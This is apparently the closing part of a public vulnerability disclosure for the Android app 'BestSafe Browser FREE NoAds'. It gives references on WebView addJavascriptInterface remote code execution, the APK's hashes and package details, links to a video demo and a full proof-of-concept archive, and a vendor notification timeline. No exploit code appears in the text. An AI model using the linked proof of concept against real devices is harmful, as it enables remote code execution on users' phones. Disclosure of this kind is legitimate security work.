http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614

Filename: BestSafe Browser FREE NoAds_vv3.apk
File size: 10,593,599 Bytes

md5: db5cef1b11df38ba7a560d147e6be3e6
sha1: dd08b1c8af4e8fb4b62c32aed3cb3544042774d6
sha256: bcf7d43f060d7e50d02a1f38abf6308961c7fd0aa0bac718e01c2ead28d7ea1d

App Name: BestSafe Browser FREE NoAds
Package Name: a1.bestsafebrowser.com
Package Version: v3

:)

=== EOF ===

Video demo:
https://www.youtube.com/watch?v=VXNVzjsH0As

FULL POC Archive:
https://mega.nz/#!saRkTCxD!p42DYndcH95iFViaLCmtUvt9Xwbtm1x9MiND--Xng38

The following is the timeline:
29 June 2017 - Vendor is notified.
29 June 2017 - Vendor pulls apps from app store and files privacy and trademark complaints with YouTube. Vendor does not intend to fix vulnerabilities.
30 June 2017 - All disclosure websites notified, including Exploit-DB.